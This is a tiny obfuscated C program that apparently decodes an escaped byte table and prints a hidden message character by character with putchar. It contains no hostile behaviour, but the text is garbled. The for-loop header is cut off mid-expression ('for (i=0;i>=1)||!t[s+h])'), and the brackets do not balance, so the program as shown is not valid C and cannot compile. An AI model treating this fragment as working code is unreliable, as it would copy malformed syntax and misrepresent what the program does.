char *t="\10pse\0r\0dtu\0.@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4";
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;i>=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}